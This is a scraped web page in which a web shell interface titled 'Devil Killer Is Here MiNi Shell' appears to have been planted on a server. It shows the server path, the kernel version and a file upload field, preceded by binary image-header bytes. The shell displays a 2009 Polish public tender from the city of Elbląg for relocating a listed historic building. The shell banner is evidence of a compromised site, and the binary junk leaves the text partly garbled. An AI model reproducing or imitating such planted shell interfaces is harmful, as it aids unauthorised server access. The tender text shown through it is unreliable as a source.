JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/79927-N-2009.html

<p class="kh_header"><b>Elbląg: Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu 
na Wyspę Spichrzów w Elblągu wraz z realizacją placu postojowego
w ramach projektu
Rewitalizacja centrum miasta - rozwój funkcji turystycznych Elbląga</b><br>
<b>Numer ogłoszenia: 79927 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu 
na Wyspę Spichrzów w Elblągu wraz z realizacją placu postojowego
w ramach projektu
Rewitalizacja centrum miasta - rozwój funkcji turystycznych Elbląga.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu 
na Wyspę Spichrzów w Elblągu wraz z realizacją placu postojowego
w ramach projektu
Rewitalizacja centrum miasta - rozwój funkcji turystycznych Elbląga

Przedmiot główny:
Nazewnictwo wg CPV:	Roboty budowlane w zakresie budynków

Przedmiot dodatkowy:
Nazewnictwo wg CPV:	Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne

Przedmiotem zamówienia są roboty budowlane polegające na rozbiórce zabytkowego budynku przy ul. 12 Lutego 5A i budowie budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego:
I etap:	Rozbiórka zabytkowego budynku przy ul. 12 Lutego 5A,
II etap: 	Budowa budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego.

2.	Zamawiający informuje, że projekt będzie współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 objęty Programem Rozwoju Turystyki w obszarze Kanału Elbląskiego i Pojezierza Iławskiego na lata 2004-2006 z perspektywą lat 2007-2013.

3.	Przedmiot zamówienia opisuje dokumentacja projektowa oraz specyfikacje techniczne wykonania i odbioru robót budowlanych, opracowane przez Project System Piotr Pałdyna, Elbląg ul. Kumieli 1-2:

A. DOKUMENTACJA PROJEKTOWA - PRZEDMIARY ROBÓT:
dla
I etapu: Rozbiórka zabytkowego budynku przy ul. 12 Lutego 5A i 
II etapu: Budowa budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego:

1)	Przedmiar robót do projekt rozbiórki budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - roboty budowlane rozbiórkowe
	Branża:	Budowlana
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
Dz. nr 171/16, 171/17, 171/18, 170/4, 170/5, 57/17
2)	Przedmiar
Nazwa inwestycji:	Przeniesienie budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów ul. Warszawska 51 w Elblągu
Adres inwestycji:	82-300 Elbląg, ul. 12 Lutego 5a; ul. Warszawska 51
Branża:	Elektryczna i teletechniczna
3)	Przedmiar robót do projekt rozbiórki budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - instalacje wewnętrzne
	Branża:	Sanitarna
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
Dz. nr 171/16, 171/17, 171/18, 170/4, 170/5, 57/17
4)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - sztukaterie
	Branża:	Konserwatorska
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
5)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - boazeria
	Branża:	Konserwatorska
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
6)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - detal architektoniczny
	Branża:	Konserwatorska
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
7)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - polichromie
	Branża:	Konserwatorska
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
8)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - renowacja stolarki
	Branża:	Konserwatorska
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
9)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - roboty budowlane
	Branża:	Budowlana 
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
10)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Drogi i zieleń
	Branża:	Drogowa
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
11)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - instalacja grzewcza
	Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
12)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - instalacja wentylacyjna
	Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
13)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - instalacje wod-kan
	Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
14)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Przyłącza wod-kan
	Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
15)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Budynek - węzeł ciepłowniczy
	Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
16)	Przedmiar robót do projektu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Przedmiar robót
	Obiekt:	Śmietnik podziemny
	Branża:	Budowlana
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
	Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15

Przedmiary robót stanowią ZAŁĄCZNIK Nr 5 do SIWZ.

B. DOKUMENTACJA PROJEKTOWA - PROJEKTY:

I etap - Rozbiórka zabytkowego budynku przy ul. 12 Lutego 5A:

1)	Projekt rozbiórki - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy
	Branża:	Architektura, konstrukcja, BIOZ
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
		Dz. nr 171/16, 171/17, 171/18, 170/4, 170/5, 57/17
2)	Projekt budowlany rozbiórki przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
3)	Projekt organizacji robót i zagospodarowania placu rozbiórki budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Projekt organizacji robót i zagospodarowania placu rozbiórki
	Obiekt:	Budynek zabytkowy
	Adres obiektu:	ul. 12 Lutego 5A, 82-300 Elbląg
		Dz. nr 171/16, 171/17, 171/18, 170/4, 170/5, 57/17 obręb 15
4)	Projekt organizacji ruchu dla przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. 12 Lutego 5A, 82-300 Elbląg
	Rodzaj opracowania:	Projekt organizacji ruchu
	Obiekt:	Budynek zabytkowy
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
		Dz. nr 171/16, 171/17, 171/18, 170/4, 170/5, 57/17

II etap: Budowa budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego:

5)	Projekt budowlany budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy administracyjno-biurowy
Branża:	Architektura, konstrukcja, zagospodarowania terenu, zieleń, mała architektura, BIOZ
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
6)	Projekt budowlany budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy administracyjno-biurowy
Branża:	Elektryczna
Adres obiektu:	Elbląg, ul. Warszawska 51, nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, obręb 15
7)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna - instalacja wentylacyjna
	Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
8)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna - instalacja wod. - kan.
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
9)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna - przyłącza wod. - kan.
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
10)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna - instalacja grzewcza
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
11)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Budynek zabytkowy 
Branża:	Sanitarna - węzeł ciepłowniczy
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obrąb 15
12)	Projekt budowlany przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt budowlano-wykonawczy
	Obiekt:	Drogi i parkingi 
Branża:	Drogi
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
13)	Projekt organizacji robót i zagospodarowania placu budowy budynku - przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Projekt organizacji robót i zagospodarowania placu budowy
	Obiekt:	Budynek zabytkowy administracyjno-biurowy
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15

C. SPECYFIKACJE TECHNICZNE WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
dla
I etapu: Rozbiórka zabytkowego budynku przy ul. 12 Lutego 5A i 
II etapu: Budowa budynku zabytkowego przeniesionego z ul. 12 Lutego 5A na teren Wyspy Spichrzów przy ul. Warszawskiej 51 w Elblągu wraz z realizacją placu postojowego:

1)	Specyfikacja techniczna do projektu przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na teren Wyspy Spichrzów w Elblągu ul. Warszawska 51, 82-300 Elbląg
	Rodzaj opracowania:	Specyfikacja techniczna
	Obiekt:	Przeniesienie budynku zabytkowego 
Branża:	Budowlana, sanitarna, drogowa
Adres obiektu:	ul. Warszawska 51, 82-300 Elbląg
		Nr dz. 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, 3 obręb 15
2)	Specyfikacja techniczna do projektu budowlanego przeniesienia budynku zabytkowego z ul. 12 Lutego 5A na ul. Warszawską 51, na terenie Wyspy Spichrzów w Elblągu,
Działka  220/3, 220/8, 221/1, 221/2, 223/2, 344/1, obręb 15
	Rodzaj opracowania:	Specyfikacja techniczna
	Obiekt:	Obiekt usługowy 
Branża:	Elektryczna
Adres obiektu:	Elbląg, ul. Warszawska 51, dz. nr 220/3, 220/8, 221/1, 221/2, 223/2, 344/1, obręb 15

D.	INWENTARYZACJA I EKSPERTYZA TECHNICZNA:
1)	Ekspertyza techniczna zabytkowego budynku z ulicy 12 Lutego w Elblągu
Rodzaj opracowania:	Ekspertyza techniczna
Obiekt:	Obiekt biurowy
	Branża:	Konstrukcja
	Adres obiektu:	ul. 12 Lutego 5A, 82-300 Elbląg

2)	Projekt przeniesienia zabytkowego budynku z ulicy 12 Lutego w Elblągu na teren Wyspy Spichrzów w Elblągu
	Rodzaj opracowania:	Inwentaryzacja
	Obiekt:	Obiekt biurowy
	Branża:	Architektura
	Adres obiektu:	ul. 12 Lutego 5A, 82-300 Elbląg 
3)	Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu na teren Wyspy Spichrzów w Elblągu w rachach Projektu Rewitalizacja centrum Miasta - Wyspy Spichrzów w Elblągu
Rodzaj opracowania:	Inwentaryzacja detalu architektonicznego na elewacji. Projekt technologiczny demontażu i montażu detali architektonicznych. Program prac konserwatorskich. Orzeczenie konserwatorskie.
	Obiekt:	Budynek użyteczności publicznej
	Branża:	Konserwatorska
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
4)	Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu na teren Wyspy Spichrzów w Elblągu w rachach Projektu Rewitalizacja centrum Miasta - Wyspy Spichrzów w Elblągu
Rodzaj opracowania:	Inwentaryzacja stolarki wewnątrz budynku. Projekt technologiczny demontażu i montażu. Program prac. Orzeczenie konserwatorskie.
	Obiekt:	Budynek użyteczności publicznej
	Branża:	Konserwatorska
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
5)	Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu na teren Wyspy Spichrzów w Elblągu w rachach Projektu Rewitalizacja centrum Miasta - Wyspy Spichrzów w Elblągu
Rodzaj opracowania:	Inwentaryzacja wystroju sztukatorskiego wewnątrz budynku. Projekt technologiczny demontażu i montażu. Program prac konserwatorskich. Orzeczenie konserwatorskie.
	Obiekt:	Budynek użyteczności publicznej
	Branża:	Konserwatorska
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A
6)	Przeniesienie zabytkowego budynku z ulicy 12 Lutego w Elblągu na teren Wyspy Spichrzów w Elblągu w rachach Projektu Rewitalizacja centrum Miasta - Wyspy Spichrzów w Elblągu
Rodzaj opracowania:	Inwentaryzacja malowideł ściennych wewnątrz budynku. Projekt technologiczny demontażu i montażu. Program prac konserwatorskich. Orzeczenie konserwatorskie.
	Obiekt:	Budynek użyteczności publicznej
	Branża:	Konserwatorska
	Adres obiektu:	82-300 Elbląg, ul. 12 Lutego 5A

Dokumentacja projektowa wymieniona w pkt B., specyfikacje techniczne wymienione w pkt C. oraz inwentaryzacja i ekspertyza techniczna wymienione w pkt D. stanowią ZAŁĄCZNIK Nr 6 do SIWZ.

4.	Zamawiający informuje, że budynek zabytkowy przy ul. 12 Lutego 5A objęty jest ochroną konserwatorską poprzez wpis do rejestru zabytkó w pod numerem 413/95 na mocy decyzji z dnia 24.01.1995 r.
5.	Roboty muszą być prowadzone pod nadzorem konserwatorskim dla lokalizacji przy ul. 12 Lutego oraz nadzorem archeologicznym i konserwatorskim dla lokalizacji na Wyspie Spichrzów w Elblągu.
6.	Wykonawca zapewni nadzór archeologiczny i konserwatorski.
7.	Prace konserwatorskie mogą prowadzić tylko osoby spełniające wymagania określone w § 7 ust. 1 i 2 Rozporządzenia Ministra Kultury z dnia 09 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150, poz. 1579).
8.	Robotami budowlanymi może kierować tylko osoba, która spełnia wymagania określone w § 8 ust. 1 rozporządzenia Ministra Kultury z dnia 09 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytkó w oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz.U. Nr 150, poz. 1579).
9.	Wykonawca pokrywa koszty zajęcia pasa drogowego.
10.	Zamawiający informuje, że powoła Inżyniera Kontraktu. Zamawiający mocą podpisanej umowy z Inżynierem przekaże odpowiedzialność oraz pełnomocnictwa do bezpośredniego monitorowania i nadzorowania realizacji robót w zakresie określonym dokumentacją projektową, zgodnie z Warunkami Kontraktowymi na budowę dla kontraktów kosztorysowych FIDIC 1999, procedurą obowiązującą przy realizacji inwestycji w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013 oraz warunkami ustalonymi w umowie zawartej z Wykonawcą robót budowlanych.  
11.	Zaleca się, aby Wykonawca dokonał wizji lokalnej w celu zapoznania się z zakresem prac i warunkami ich wykonania.
12.	Zamawiający wymaga udzielenia 39 miesięcy gwarancji licząc od daty odbioru robót.
13.	Zamawiający informuje, że w przypadku składania zabezpieczenia należytego wykonania umowy w formie gwarancji Wykonawca będzie zobowiązany do złożenia ich w formie zgodnej ze wzorami stanowiącymi ZAŁĄCZNIK Nr 4 do SIWZ.
14.	Wykonawca w przypadku wygrania przetargu zobowiązany jest do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 647 ze znaczkiem 1 - Kodeksu cywilnego.
15.	Wykonawca w przypadku wygrania przetargu zobowiązany jest do zawarcia umów przelewu wierzytelności na rzecz podwykonawców, należnych im za wykonane roboty.
